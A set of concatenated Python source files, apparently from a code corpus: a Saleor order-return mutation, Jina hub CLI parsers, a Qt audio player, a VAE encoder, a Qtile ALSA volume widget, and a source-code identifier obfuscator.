description="ID of the order to be returned.", required=True
)
input = OrderReturnProductsInput(
required=True,
description="Fields required to return products.",
)
@classmethod
def clean_input(cls, info, order_id, input):
cleaned_input = {}
amount_to_refund = input.get("amount_to_refund")
include_shipping_costs = input["include_shipping_costs"]
refund = input["refund"]
qs = order_models.Order.objects.prefetch_related("payments")
order = cls.get_node_or_error(
info, order_id, field="order", only_type=Order, qs=qs
)
payment = order.get_last_payment()
if refund:
cls.clean_order_payment(payment, cleaned_input)
cls.clean_amount_to_refund(amount_to_refund, payment, cleaned_input)
cleaned_input.update(
{
"include_shipping_costs": include_shipping_costs,
"order": order,
"refund": refund,
}
)
order_lines_data = input.get("order_lines")
fulfillment_lines_data = input.get("fulfillment_lines")
if order_lines_data:
cls.clean_lines(order_lines_data, cleaned_input)
if fulfillment_lines_data:
cls.clean_fulfillment_lines(
fulfillment_lines_data,
cleaned_input,
whitelisted_statuses=[
FulfillmentStatus.FULFILLED,
FulfillmentStatus.REFUNDED,
FulfillmentStatus.WAITING_FOR_APPROVAL,
],
)
return cleaned_input
@classmethod
def perform_mutation(cls, _root, info, **data):
cleaned_input = cls.clean_input(info, data.get("order"), data.get("input"))
order = cleaned_input["order"]
response = create_fulfillments_for_returned_products(
info.context.user,
info.context.app,
order,
cleaned_input.get("payment"),
cleaned_input.get("order_lines", []),
cleaned_input.get("fulfillment_lines", []),
info.context.plugins,
cleaned_input["refund"],
cleaned_input.get("amount_to_refund"),
cleaned_input["include_shipping_costs"],
)
return_fulfillment, replace_fulfillment, replace_order = response
return cls(
order=order,
return_fulfillment=return_fulfillment,
replace_fulfillment=replace_fulfillment,
replace_order=replace_order,
)
|
the-stack_106_30633 | from ..base import set_base_parser
from ..helper import _chf
def set_hub_push_parser(parser=None):
"""Set the parser for the hub push
:param parser: an optional existing parser to build upon
:return: the parser
"""
if not parser:
parser = set_base_parser()
from .push import mixin_hub_push_parser
mixin_hub_push_parser(parser)
return parser
def set_hub_pull_parser(parser=None):
"""Set the parser for the hub pull
:param parser: an optional existing parser to build upon
:return: the parser
"""
if not parser:
parser = set_base_parser()
from .pull import mixin_hub_pull_parser
mixin_hub_pull_parser(parser)
return parser
def set_hub_parser(parser=None):
"""Set the parser for the hub
:param parser: the parser configure
"""
if not parser:
parser = set_base_parser()
spp = parser.add_subparsers(
dest='hub',
description='use `%(prog)-8s [sub-command] --help` '
'to get detailed information about each sub-command',
required=True,
)
set_hub_push_parser(
spp.add_parser(
'push',
help='push an executor package to the Jina hub',
description='Push an executor package to the Jina hub',
formatter_class=_chf,
)
)
set_hub_pull_parser(
spp.add_parser(
'pull',
help='download an executor package/image from the Jina hub',
description='Download an executor package/image from the Jina hub',
formatter_class=_chf,
)
)
|
the-stack_106_30634 |
from .imports import *
class AudioPlayer(QWidget):
def __init__(self, parent=None):
QWidget.__init__(self,parent)
layout = QHBoxLayout()
if AUDIO_ENABLED:
self.player = QMediaPlayer()
self.player.setNotifyInterval(10)
self.player.positionChanged.connect(self.checkEnd)
self.player.positionChanged.connect(self.positionChanged)
self.begin = -1 #in seconds
self.end = -1
self.duration = 0
self.slider = QSlider(Qt.Horizontal)
self.slider.setEnabled(False)
self.labelDuration = QLabel()
self.slider.sliderMoved.connect(self.seek)
layout.addWidget(self.slider)
layout.addWidget(self.labelDuration)
self.setupActions()
self.playbar = QToolBar()
self.playbar.addAction(self.playStopAction)
self.playbar.addAction(self.stopAction)
layout.addWidget(self.playbar, alignment=Qt.AlignHCenter)
self.setLayout(layout)
def seek(self, milliseconds):
return
self.player.setPosition(self.begin+milliseconds)
def playStopAudio(self):
if not AUDIO_ENABLED:
return
if self.player.mediaStatus() == QMediaPlayer.NoMedia:
return
if self.player.state() == QMediaPlayer.StoppedState:
self.play()
elif self.player.state() == QMediaPlayer.PausedState:
self.play()
elif self.player.state() == QMediaPlayer.PlayingState:
self.pause()
def setupActions(self):
self.playStopAction = QAction(self.style().standardIcon(QStyle.SP_MediaPlay), self.tr("Play"), self)
self.playStopAction.setShortcut(Qt.NoModifier + Qt.Key_Space)
self.playStopAction.setDisabled(False)
self.playStopAction.triggered.connect(self.playStopAudio)
self.stopAction = QAction(self.style().standardIcon(QStyle.SP_MediaStop), self.tr("Play"), self)
self.stopAction.setDisabled(False)
self.stopAction.triggered.connect(self.stop)
def setLimits(self,begin = -1, end = -1):
self.begin = begin * 1000
self.end = end * 1000
if self.end > 0:
self.duration = (self.end - self.begin)
else:
self.duration = self.player.duration()
print(self.duration)
self.slider.setRange(0, self.duration)
if not AUDIO_ENABLED:
return
if self.begin < 0:
self.player.setPosition(0)
else:
self.player.setPosition(self.begin)
def positionChanged(self, progress):
if not self.slider.isSliderDown():
self.slider.setValue(progress - self.begin)
self.updateDurationInfo(progress - self.begin)
def updateDurationInfo(self, currentInfo):
duration = self.duration
if currentInfo < 0:
currentInfo = 0
if currentInfo or duration:
currentTime = QTime((currentInfo/3600000)%60, (currentInfo/60000)%60,
(currentInfo/1000)%60, (currentInfo)%1000)
totalTime = QTime((duration/3600000)%60, (duration/60000)%60,
(duration/1000)%60, (duration)%1000)
format = 'hh:mm:ss.zzz' if duration > 3600 else 'mm:ss.zzz'
tStr = currentTime.toString(format) + " / " + totalTime.toString(format)
else:
tStr = ""
self.labelDuration.setText(tStr)
def play(self):
if not AUDIO_ENABLED:
return
self.playStopAction.setIcon(
self.style().standardIcon(QStyle.SP_MediaPause))
if self.player.position() >= self.end or self.player.position() < self.begin:
self.player.setPosition(self.begin)
self.player.play()
def pause(self):
if not AUDIO_ENABLED:
return
self.playStopAction.setIcon(
self.style().standardIcon(QStyle.SP_MediaPlay))
self.player.pause()
def stop(self):
if not AUDIO_ENABLED:
return
self.playStopAction.setIcon(
self.style().standardIcon(QStyle.SP_MediaPlay))
self.player.stop()
def checkEnd(self, position):
if self.end > self.begin and position >= self.end:
self.stop()
def setAudioFile(self, path):
if not AUDIO_ENABLED:
return
self.path = path
url = QUrl.fromLocalFile(path)
self.player.setMedia(QMediaContent(url))
|
the-stack_106_30635 | """
VAE encoder + Classifier
"""
import torch
from torch import nn
import torch.nn.init as init
class View(nn.Module):
def __init__(self, size):
super(View, self).__init__()
self.size = size
def forward(self, tensor):
return tensor.view(self.size)
class Encoder(nn.Module):
def __init__(self, z_dim=32, nc=3):
super(Encoder, self).__init__()
s2 = 14
self.encoder = nn.Sequential(
nn.Conv2d(nc, 128, 4, 2, 1, bias=False), # B, 128, 32, 32
nn.BatchNorm2d(128),
nn.ReLU(True),
nn.Conv2d(128, 256, 4, 2, 1, bias=False), # B, 256, 16, 16
nn.BatchNorm2d(256),
nn.ReLU(True),
nn.Conv2d(256, 512, 4, 2, 1, bias=False), # B, 512, 8, 8
nn.BatchNorm2d(512),
nn.ReLU(True),
nn.Conv2d(512, 1024, 4, 2, 1, bias=False), # B, 1024, 4, 4
nn.BatchNorm2d(1024),
nn.ReLU(True),
View((-1, 1024*s2*s2)), # B, 1024*4*4
)
self.fc_mu = nn.Linear(1024*s2*s2, z_dim) # B, z_dim
self.fc_logvar = nn.Linear(1024*s2*s2, z_dim) # B, z_dim
def weight_init(self):
for block in self._modules:
try:
for m in self._modules[block]:
kaiming_init(m)
except:
kaiming_init(block)
def forward(self, x):
z = self._encode(x)
# print("debug, z.shape ", z.shape)
mu, logvar = self.fc_mu(z), self.fc_logvar(z)
return z, mu, logvar
# print("mu.shape ...", mu.shape, logvar.shape)
# z = self.reparameterize(mu, logvar)
# x_recon = self._decode(z)
#
# return x_recon, z, mu, logvar
def reparameterize(self, mu, logvar):
stds = (0.5 * logvar).exp()
epsilon = torch.randn(*mu.size())
if mu.is_cuda:
stds, epsilon = stds.cuda(), epsilon.cuda()
latents = epsilon * stds + mu
return latents
def _encode(self, x):
return self.encoder(x)
# def _decode(self, z):
# return self.decoder(z)
class Discriminator(nn.Module):
"""Adversary architecture(Discriminator) for WAE-GAN."""
def __init__(self, z_dim=32):
super(Discriminator, self).__init__()
self.z_dim = z_dim
self.net = nn.Sequential(
nn.Linear(z_dim, 512),
nn.ReLU(True),
nn.Linear(512, 512),
nn.ReLU(True),
nn.Linear(512, 1),
nn.Sigmoid()
)
self.weight_init()
def weight_init(self):
for block in self._modules:
for m in self._modules[block]:
kaiming_init(m)
def forward(self, z):
return self.net(z)
def kaiming_init(m):
if isinstance(m, (nn.Linear, nn.Conv2d)):
init.kaiming_normal(m.weight)
if m.bias is not None:
m.bias.data.fill_(0)
elif isinstance(m, (nn.BatchNorm1d, nn.BatchNorm2d)):
m.weight.data.fill_(1)
if m.bias is not None:
m.bias.data.fill_(0)
|
the-stack_106_30637 | import re
import shutil
import subprocess
from libqtile import bar, confreader, images
from libqtile.log_utils import logger
from libqtile.widget import base
RE_VOL = re.compile(r"Playback\s[0-9]+\s\[([0-9]+)%\]\s\[(on|off)\]")
class ALSAWidget(base._Widget, base.PaddingMixin, base.MarginMixin):
"""
The widget is very simple and, so far, just allows controls for
volume up, down and mute.
Volume control is handled by running the appropriate amixer command.
The widget is updated instantly when volume is changed via this
code, but will also update on an interval (i.e. it will reflect
changes to volume made by other programs).
The widget displays volume level via an icon, bar or both. The icon
is permanently visible while the bar only displays when the volume
is changed and will hide after a user-defined period.
"""
orientations = base.ORIENTATION_HORIZONTAL
defaults = [
("font", "sans", "Default font"),
("fontsize", None, "Font size"),
("foreground", "ffffff", "Font colour"),
("mode", "bar", "Display mode: 'icon', 'bar', 'both'."),
("hide_interval", 5, "Timeout before bar is hidden after update"),
("text_format", "{volume}%", "String format"),
("bar_width", 75, "Width of display bar"),
("bar_colour_normal", "009900", "Colour of bar in normal range"),
("bar_colour_high", "999900", "Colour of bar if high range"),
("bar_colour_loud", "990000", "Colour of bar in loud range"),
("bar_colour_mute", "999999", "Colour of bar if muted"),
("limit_normal", 70, "Max percentage for normal range"),
("limit_high", 90, "Max percentage for high range"),
("limit_loud", 100, "Max percentage for loud range"),
("update_interval", 5, "Interval to update widget (e.g. if changes made in other apps)."),
("theme_path", None, "Path to theme icons."),
("step", 5, "Amount to increase volume by"),
("device", "Master", "Name of ALSA device"),
]
_screenshots = [
("volumecontrol-icon.gif", "'icon' mode"),
("volumecontrol-bar.gif", "'bar' mode"),
("volumecontrol-both.gif", "'both' mode"),
]
icon_map = []
def __init__(self, **config):
base._Widget.__init__(self, bar.CALCULATED, **config)
self.add_defaults(ALSAWidget.defaults)
self.add_defaults(base.PaddingMixin.defaults)
self.add_defaults(base.MarginMixin.defaults)
self.add_callbacks(
{
"Button1": self.cmd_toggle_mute,
"Button4": self.cmd_volume_up,
"Button5": self.cmd_volume_down,
}
)
# Set up necessary variables
self.muted = False
self.volume = -1
self.oldvol = -1
self.oldmute = False
# Variable to store icons
self.surfaces = {}
# Work out what we need to display
self.show_bar = self.mode in ["bar", "both"]
self.show_icon = self.mode in ["icon", "both"]
# Define some variables to prevent early errors
self.iconsize = 0
self.text_width = 0
# Variables for the timers we need
self.update_timer = None
self.hide_timer = None
# Start of with bar hidden
self.hidden = True
# Map bar colours for volume level
self.colours = [
(self.limit_normal, self.bar_colour_normal),
(self.limit_high, self.bar_colour_high),
(self.limit_loud, self.bar_colour_loud),
]
def _configure(self, qtile, bar):
base._Widget._configure(self, qtile, bar)
self.get_volume()
if self.mode in ["icon", "both"] and not self.theme_path:
logger.error("You must set the `theme_path` when using icons")
raise confreader.ConfigError("No theme_path provided.")
if self.show_icon:
try:
self.setup_images()
except images.LoadingError:
logger.error(f"Could not find volume icons at {self.theme_path}.")
raise confreader.ConfigError("Volume icons not found.")
# Minimum size needed to display text
self.text_width = self.max_text_width()
# Bar size is bigger of needed space and user-defined size
self.bar_size = max(self.text_width, self.bar_width)
# Start the refresh timer (to check if volume changed elsewhere)
self.set_refresh_timer()
def max_text_width(self):
# Calculate max width of text given defined layout
txt_width, _ = self.drawer.max_layout_size(
[self.text_format.format(volume=100)], self.font, self.fontsize
)
return txt_width
def calculate_length(self):
# Size depends on what's being shown
# Start with zero width and add to it
width = 0
# Showing icons?
if self.show_icon:
width += self.iconsize
# Showing bar?
if self.show_bar and not self.hidden:
width += self.bar_size
return width
def status_change(self, vol, muted):
# Something's changed so let's update display
# Unhide bar
self.hidden = False
# Get new values
self.volume = vol
self.muted = muted
# Restart timer
self.set_refresh_timer()
# If we're showing the bar then set timer to hide it
if self.show_bar:
self.set_hide_timer()
# Draw
self.bar.draw()
def setup_images(self):
# Load icons
names = (
"audio-volume-muted",
"audio-volume-low",
"audio-volume-medium",
"audio-volume-high",
)
d_images = images.Loader(self.theme_path)(*names)
for name, img in d_images.items():
new_height = self.bar.height - 1
img.resize(height=new_height)
self.iconsize = img.width
self.surfaces[name] = img.pattern
def draw(self):
# Define an offset for x placement
x_offset = 0
# Clear the widget
self.drawer.clear(self.background or self.bar.background)
# Which icon do we need?
if self.show_icon:
if self.muted or self.volume == 0:
img_name = "audio-volume-muted"
elif self.volume <= 35:
img_name = "audio-volume-low"
elif self.volume <= 70:
img_name = "audio-volume-medium"
else:
img_name = "audio-volume-high"
# Draw icon
self.drawer.ctx.set_source(self.surfaces[img_name])
self.drawer.ctx.paint()
# Increase offset
x_offset += self.iconsize
# Does bar need to be displayed
if self.show_bar and not self.hidden:
# Text and colour depends on mute status and volume level
if not self.muted:
text = self.text_format.format(volume=self.volume)
fill = next(x[1] for x in self.colours if self.volume <= x[0])
else:
text = "X"
fill = self.bar_colour_mute
# Set bar colours
self.drawer.set_source_rgb(fill)
# Draw the bar
self.drawer.fillrect(x_offset, 0, self.bar_size * (self.volume / 100), self.height, 1)
# Create a text box
layout = self.drawer.textlayout(
text, self.foreground, self.font, self.fontsize, None, wrap=False
)
# We want to centre this vertically
y_offset = (self.bar.height - layout.height) / 2
# Set the layout as wide as the widget so text is centred
layout.width = self.bar_size
# Add the text to our drawer
layout.draw(x_offset, y_offset)
self.drawer.draw(offsetx=self.offset, offsety=self.offsety, width=self.length)
def refresh(self):
# Check the volume levels to see if they've changed
# Callback will be triggered if they have
self.get_volume()
# Restart timer
self.set_refresh_timer()
def set_refresh_timer(self):
# Delete old timer
if self.update_timer:
self.update_timer.cancel()
# Start new timer
self.update_timer = self.timeout_add(self.update_interval, self.refresh)
def set_hide_timer(self):
# Cancel old timer
if self.hide_timer:
self.hide_timer.cancel()
# Set new timer
self.hide_timer = self.timeout_add(self.hide_interval, self.hide)
def hide(self):
# Hide the widget
self.hidden = True
self.bar.draw()
def _run(self, cmd):
if not shutil.which("amixer"):
logger.warning("'amixer' is not installed. Unable to set volume.")
return
# Run the amixer command and use regex to capture volume line
proc = subprocess.run(cmd.split(), capture_output=True)
matched = RE_VOL.search(proc.stdout.decode())
# If we find a match, extract volume and mute status
if matched:
self.volume = int(matched.groups()[0])
self.muted = matched.groups()[1] == "off"
# If volume or mute status has changed
# then we need to trigger callback
if any([self.volume != self.oldvol, self.muted != self.oldmute]):
self.status_change(self.volume, self.muted)
# Record old values
self.oldvol = self.volume
self.oldmute = self.muted
def get_volume(self):
cmd = "amixer get {}".format(self.device)
self._run(cmd)
def cmd_volume_up(self, *args, **kwargs):
"""Increase volume"""
cmd = "amixer set {} {}%+".format(self.device, self.step)
self._run(cmd)
def cmd_volume_down(self, *args, **kwargs):
"""Decrease volume"""
cmd = "amixer set {} {}%-".format(self.device, self.step)
self._run(cmd)
def cmd_toggle_mute(self, *args, **kwargs):
"""Mute audio output"""
cmd = "amixer set {} toggle".format(self.device)
self._run(cmd)
def info(self):
info = base._Widget.info(self)
info["volume"] = self.volume
info["muted"] = self.muted
return info
|
the-stack_106_30638 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
__doc__ = """\
A collection of functions for obfuscating code.
"""
import os
import sys
import tokenize
import keyword
import sys
import unicodedata
from random import shuffle, choice
from itertools import permutations
# Import our own modules
from . import analyze
from . import token_utils
if not isinstance(sys.version_info, tuple):
if sys.version_info.major == 3:
unichr = chr # So we can support both 2 and 3
try:
unichr(0x10000) # Will throw a ValueError on narrow Python builds
HIGHEST_UNICODE = 0x10FFFF # 1114111
except:
HIGHEST_UNICODE = 0xFFFF # 65535
# Reserved words can be overridden by the script that imports this module
RESERVED_WORDS = keyword.kwlist + analyze.builtins
VAR_REPLACEMENTS = {} # So we can reference what's already been replaced
FUNC_REPLACEMENTS = {}
CLASS_REPLACEMENTS = {}
UNIQUE_REPLACEMENTS = {}
def obfuscation_machine(use_unicode=False, identifier_length=1):
"""
A generator that returns short sequential combinations of lower and
upper-case letters that will never repeat.
If *use_unicode* is ``True``, use nonlatin cryllic, arabic, and syriac
letters instead of the usual ABCs.
The *identifier_length* represents the length of the string to return using
the aforementioned characters.
"""
# This generates a list of the letters a-z:
lowercase = list(map(chr, range(97, 123)))
# Same thing but ALL CAPS:
uppercase = list(map(chr, range(65, 90)))
if use_unicode:
# Python 3 lets us have some *real* fun:
allowed_categories = ('LC', 'Ll', 'Lu', 'Lo', 'Lu')
# All the fun characters start at 1580 (hehe):
big_list = list(map(chr, range(1580, HIGHEST_UNICODE)))
max_chars = 1000 # Ought to be enough for anybody :)
combined = []
rtl_categories = ('AL', 'R') # AL == Arabic, R == Any right-to-left
last_orientation = 'L' # L = Any left-to-right
# Find a good mix of left-to-right and right-to-left characters
while len(combined) < max_chars:
char = choice(big_list)
if unicodedata.category(char) in allowed_categories:
orientation = unicodedata.bidirectional(char)
if last_orientation in rtl_categories:
if orientation not in rtl_categories:
combined.append(char)
else:
if orientation in rtl_categories:
combined.append(char)
last_orientation = orientation
else:
combined = lowercase + uppercase
shuffle(combined) # Randomize it all to keep things interesting
while True:
for perm in permutations(combined, identifier_length):
perm = "".join(perm)
if perm not in RESERVED_WORDS: # Can't replace reserved words
yield perm
identifier_length += 1
def apply_obfuscation(source):
"""
Returns 'source' all obfuscated.
"""
global keyword_args
global imported_modules
tokens = token_utils.listified_tokenizer(source)
keyword_args = analyze.enumerate_keyword_args(tokens)
imported_modules = analyze.enumerate_imports(tokens)
variables = find_obfuscatables(tokens, obfuscatable_variable)
classes = find_obfuscatables(tokens, obfuscatable_class)
functions = find_obfuscatables(tokens, obfuscatable_function)
for variable in variables:
replace_obfuscatables(
tokens, obfuscate_variable, variable, name_generator)
for function in functions:
replace_obfuscatables(
tokens, obfuscate_function, function, name_generator)
for _class in classes:
replace_obfuscatables(tokens, obfuscate_class, _class, name_generator)
return token_utils.untokenize(tokens)
def find_obfuscatables(tokens, obfunc, ignore_length=False):
"""
Iterates over *tokens*, which must be an equivalent output to what
tokenize.generate_tokens() produces, calling *obfunc* on each with the
following parameters:
- **tokens:** The current list of tokens.
- **index:** The current position in the list.
*obfunc* is expected to return the token string if that token can be safely
obfuscated **or** one of the following optional values which will instruct
find_obfuscatables() how to proceed:
- **'__skipline__'** Keep skipping tokens until a newline is reached.
- **'__skipnext__'** Skip the next token in the sequence.
If *ignore_length* is ``True`` then single-character obfuscatables will
be obfuscated anyway (even though it wouldn't save any space).
"""
global keyword_args
keyword_args = analyze.enumerate_keyword_args(tokens)
global imported_modules
imported_modules = analyze.enumerate_imports(tokens)
#print("imported_modules: %s" % imported_modules)
skip_line = False
skip_next = False
obfuscatables = []
for index, tok in enumerate(tokens):
token_type = tok[0]
if token_type == tokenize.NEWLINE:
skip_line = False
if skip_line:
continue
result = obfunc(tokens, index, ignore_length=ignore_length)
if result:
if skip_next:
skip_next = False
elif result == '__skipline__':
skip_line = True
elif result == '__skipnext__':
skip_next = True
elif result in obfuscatables:
pass
else:
obfuscatables.append(result)
else: # If result is empty we need to reset skip_next so we don't
skip_next = False # accidentally skip the next identifier
return obfuscatables
# Note: I'm using 'tok' instead of 'token' since 'token' is a built-in module
def obfuscatable_variable(tokens, index, ignore_length=False):
"""
Given a list of *tokens* and an *index* (representing the current position),
returns the token string if it is a variable name that can be safely
obfuscated.
Returns '__skipline__' if the rest of the tokens on this line should be skipped.
Returns '__skipnext__' if the next token should be skipped.
If *ignore_length* is ``True``, even variables that are already a single
character will be obfuscated (typically only used with the ``--nonlatin``
option).
"""
tok = tokens[index]
token_type = tok[0]
token_string = tok[1]
line = tok[4]
if index > 0:
prev_tok = tokens[index - 1]
else: # Pretend it's a newline (for simplicity)
prev_tok = (54, '\n', (1, 1), (1, 2), '#\n')
prev_tok_type = prev_tok[0]
prev_tok_string = prev_tok[1]
try:
next_tok = tokens[index + 1]
except IndexError: # Pretend it's a newline
next_tok = (54, '\n', (1, 1), (1, 2), '#\n')
next_tok_string = next_tok[1]
if token_string == "=":
return '__skipline__'
if token_type != tokenize.NAME:
return None # Skip this token
if token_string.startswith('__'):
return None
if next_tok_string == ".":
if token_string in imported_modules:
return None
if prev_tok_string == 'import':
return '__skipline__'
if prev_tok_string == ".":
return '__skipnext__'
if prev_tok_string == "for":
if len(token_string) > 2:
return token_string
if token_string == "for":
return None
if token_string in keyword_args.keys():
return None
if token_string in ["def", "class", 'if', 'elif', 'import']:
return '__skipline__'
if prev_tok_type != tokenize.INDENT and next_tok_string != '=':
return '__skipline__'
if not ignore_length:
if len(token_string) < 3:
return None
if token_string in RESERVED_WORDS:
return None
return token_string
def obfuscatable_class(tokens, index, **kwargs):
"""
Given a list of *tokens* and an *index* (representing the current position),
returns the token string if it is a class name that can be safely
obfuscated.
"""
tok = tokens[index]
token_type = tok[0]
token_string = tok[1]
if index > 0:
prev_tok = tokens[index - 1]
else: # Pretend it's a newline (for simplicity)
prev_tok = (54, '\n', (1, 1), (1, 2), '#\n')
prev_tok_string = prev_tok[1]
if token_type != tokenize.NAME:
return None # Skip this token
if token_string.startswith('__'): # Don't mess with specials
return None
if prev_tok_string == "class":
return token_string
def obfuscatable_function(tokens, index, **kwargs):
"""
Given a list of *tokens* and an *index* (representing the current position),
returns the token string if it is a function or method name that can be
safely obfuscated.
"""
tok = tokens[index]
token_type = tok[0]
token_string = tok[1]
if index > 0:
prev_tok = tokens[index - 1]
else: # Pretend it's a newline (for simplicity)
prev_tok = (54, '\n', (1, 1), (1, 2), '#\n')
prev_tok_string = prev_tok[1]
if token_type != tokenize.NAME:
return None # Skip this token
if token_string.startswith('__'): # Don't mess with specials
return None
if prev_tok_string == "def":
return token_string
def replace_obfuscatables(module, tokens, obfunc, replace, name_generator, table=None):
"""
Iterates over *tokens*, which must be an equivalent output to what
tokenize.generate_tokens() produces, replacing the given identifier name
(*replace*) by calling *obfunc* on each token with the following parameters:
- **module:** The name of the script we're currently obfuscating.
- **tokens:** The current list of all tokens.
- **index:** The current position.
- **replace:** The token string that we're replacing.
- **replacement:** A randomly generated, unique value that will be used to replace, *replace*.
- **right_of_equal:** A True or False value representing whether or not the token is to the right of an equal sign. **Note:** This gets reset to False if a comma or open paren are encountered.
- **inside_parens:** An integer that is incremented whenever an open paren is encountered and decremented when a close paren is encountered.
- **inside_function:** If not False, the name of the function definition we're inside of (used in conjunction with *keyword_args* to determine if a safe replacement can be made).
*obfunc* is expected to return the token string if that token can be safely
obfuscated **or** one of the following optional values which will instruct
find_obfuscatables() how to proceed:
- **'__open_paren__'** Increment the inside_parens value
- **'__close_paren__'** Decrement the inside_parens value
- **'__comma__'** Reset the right_of_equal value to False
- **'__right_of_equal__'** Sets the right_of_equal value to True
**Note:** The right_of_equal and the inside_parens values are reset whenever a NEWLINE is encountered.
When obfuscating a list of files, *table* is used to keep track of which
obfuscatable identifiers are which inside each resulting file. It must be
an empty dictionary that will be populated like so::
{orig_name: obfuscated_name}
This *table* of "what is what" will be used to ensure that references from
one script/module that call another are kept in sync when they are replaced
with obfuscated values.
"""
# Pretend the first line is '#\n':
skip_line = False
skip_next = False
right_of_equal = False
inside_parens = 0
inside_function = False
indent = 0
function_indent = 0
replacement = next(name_generator)
for index, tok in enumerate(tokens):
token_type = tok[0]
token_string = tok[1]
if token_type == tokenize.NEWLINE:
skip_line = False
right_of_equal = False
inside_parens = 0
elif token_type == tokenize.INDENT:
indent += 1
elif token_type == tokenize.DEDENT:
indent -= 1
if inside_function and function_indent == indent:
function_indent = 0
inside_function = False
if token_string == "def":
function_indent = indent
function_name = tokens[index + 1][1]
inside_function = function_name
result = obfunc(
tokens,
index,
replace,
replacement,
right_of_equal,
inside_parens,
inside_function
)
if result:
if skip_next:
skip_next = False
elif skip_line:
pass
elif result == '__skipline__':
skip_line = True
elif result == '__skipnext__':
skip_next = True
elif result == '__open_paren__':
right_of_equal = False
inside_parens += 1
elif result == '__close_paren__':
inside_parens -= 1
elif result == '__comma__':
right_of_equal = False
elif result == '__right_of_equal__':
# We only care if we're right of the equal sign outside of
# parens (which indicates arguments)
if not inside_parens:
right_of_equal = True
else:
if table: # Save it for later use in other files
combined_name = "%s.%s" % (module, token_string)
try: # Attempt to use an existing value
tokens[index][1] = table[0][combined_name]
except KeyError: # Doesn't exist, add it to table
table[0].update({combined_name: result})
tokens[index][1] = result
else:
tokens[index][1] = result
def obfuscate_variable(
tokens,
index,
replace,
replacement,
right_of_equal,
inside_parens,
inside_function):
"""
If the token string inside *tokens[index]* matches *replace*, return
*replacement*. *right_of_equal*, and *inside_parens* are used to determine
whether or not this token is safe to obfuscate.
"""
def return_replacement(replacement):
VAR_REPLACEMENTS[replacement] = replace
return replacement
tok = tokens[index]
token_type = tok[0]
token_string = tok[1]
if index > 0:
prev_tok = tokens[index - 1]
else: # Pretend it's a newline (for simplicity)
prev_tok = (54, '\n', (1, 1), (1, 2), '#\n')
prev_tok_string = prev_tok[1]
try:
next_tok = tokens[index + 1]
except IndexError: # Pretend it's a newline
next_tok = (54, '\n', (1, 1), (1, 2), '#\n')
if token_string == "import":
return '__skipline__'
if next_tok[1] == '.':
if token_string in imported_modules:
return None
if token_string == "=":
return '__right_of_equal__'
if token_string == "(":
return '__open_paren__'
if token_string == ")":
return '__close_paren__'
if token_string == ",":
return '__comma__'
if token_type != tokenize.NAME:
return None # Skip this token
if token_string.startswith('__'):
return None
if prev_tok_string == 'def':
return '__skipnext__' # Don't want to touch functions
if token_string == replace and prev_tok_string != '.':
if inside_function:
if token_string not in keyword_args[inside_function]:
if not right_of_equal:
if not inside_parens:
return return_replacement(replacement)
else:
if next_tok[1] != '=':
return return_replacement(replacement)
elif not inside_parens:
return return_replacement(replacement)
else:
if next_tok[1] != '=':
return return_replacement(replacement)
elif not right_of_equal:
if not inside_parens:
return return_replacement(replacement)
else:
if next_tok[1] != '=':
return return_replacement(replacement)
elif right_of_equal and not inside_parens:
return return_replacement(replacement)
def obfuscate_function(tokens, index, replace, replacement, *args):
"""
If the token string (a function) inside *tokens[index]* matches *replace*,
return *replacement*.
"""
def return_replacement(replacement):
FUNC_REPLACEMENTS[replacement] = replace
return replacement
tok = tokens[index]
token_type = tok[0]
token_string = tok[1]
prev_tok = tokens[index - 1]
prev_tok_string = prev_tok[1]
if token_type != tokenize.NAME:
return None # Skip this token
if token_string.startswith('__'):
return None
if token_string == replace:
if prev_tok_string != '.':
if token_string == replace:
return return_replacement(replacement)
else:
parent_name = tokens[index - 2][1]
if parent_name in CLASS_REPLACEMENTS:
# This should work for @classmethod methods
return return_replacement(replacement)
elif parent_name in VAR_REPLACEMENTS:
# This covers regular ol' instance methods
return return_replacement(replacement)
def obfuscate_class(tokens, index, replace, replacement, *args):
"""
If the token string (a class) inside *tokens[index]* matches *replace*,
return *replacement*.
"""
def return_replacement(replacement):
CLASS_REPLACEMENTS[replacement] = replace
return replacement
tok = tokens[index]
token_type = tok[0]
token_string = tok[1]
prev_tok = tokens[index - 1]
prev_tok_string = prev_tok[1]
if token_type != tokenize.NAME:
return None # Skip this token
if token_string.startswith('__'):
return None
if prev_tok_string != '.':
if token_string == replace:
return return_replacement(replacement)
def obfuscate_unique(tokens, index, replace, replacement, *args):
"""
If the token string (a unique value anywhere) inside *tokens[index]*
matches *replace*, return *replacement*.
.. note::
This function is only for replacing absolutely unique ocurrences of
*replace* (where we don't have to worry about their position).
"""
def return_replacement(replacement):
UNIQUE_REPLACEMENTS[replacement] = replace
return replacement
tok = tokens[index]
token_type = tok[0]
token_string = tok[1]
if token_type != tokenize.NAME:
return None # Skip this token
if token_string == replace:
return return_replacement(replacement)
def remap_name(name_generator, names, table=None):
"""
Produces a series of variable assignments in the form of::
<obfuscated name> = <some identifier>
for each item in *names* using *name_generator* to come up with the
replacement names.
If *table* is provided, replacements will be looked up there before
generating a new unique name.
"""
out = ""
for name in names:
if table and name in table[0].keys():
replacement = table[0][name]
else:
replacement = next(name_generator)
out += "%s=%s\n" % (replacement, name)
return out
def insert_in_next_line(tokens, index, string):
"""
Inserts the given string after the next newline inside tokens starting at
*tokens[index]*. Indents must be a list of indentation tokens that will
preceeed the insert (can be an empty list).
"""
tokenized_string = token_utils.listified_tokenizer(string)
for i, tok in list(enumerate(tokens[index:])):
token_type = tok[0]
if token_type in [tokenize.NL, tokenize.NEWLINE]:
for count, item in enumerate(tokenized_string):
tokens.insert(index + count + i + 1, item)
break
def obfuscate_builtins(module, tokens, name_generator, table=None):
"""
Inserts an assignment, '<obfuscated identifier> = <builtin function>' at
the beginning of *tokens* (after the shebang and encoding if present) for
every Python built-in function that is used inside *tokens*. Also, replaces
all of said builti-in functions in *tokens* with each respective obfuscated
identifer.
Obfuscated identifier names are pulled out of name_generator via next().
If *table* is provided, replacements will be looked up there before
generating a new unique name.
"""
used_builtins = analyze.enumerate_builtins(tokens)
obfuscated_assignments = remap_name(name_generator, used_builtins, table)
replacements = []
for assignment in obfuscated_assignments.split('\n'):
replacements.append(assignment.split('=')[0])
replacement_dict = dict(zip(used_builtins, replacements))
if table:
table[0].update(replacement_dict)
iter_replacements = iter(replacements)
for builtin in used_builtins:
replace_obfuscatables(
module, tokens, obfuscate_unique, builtin, iter_replacements)
# Check for shebangs and encodings before we do anything else
skip_tokens = 0
matched_shebang = False
matched_encoding = False
for tok in tokens[0:4]: # Will always be in the first four tokens
line = tok[4]
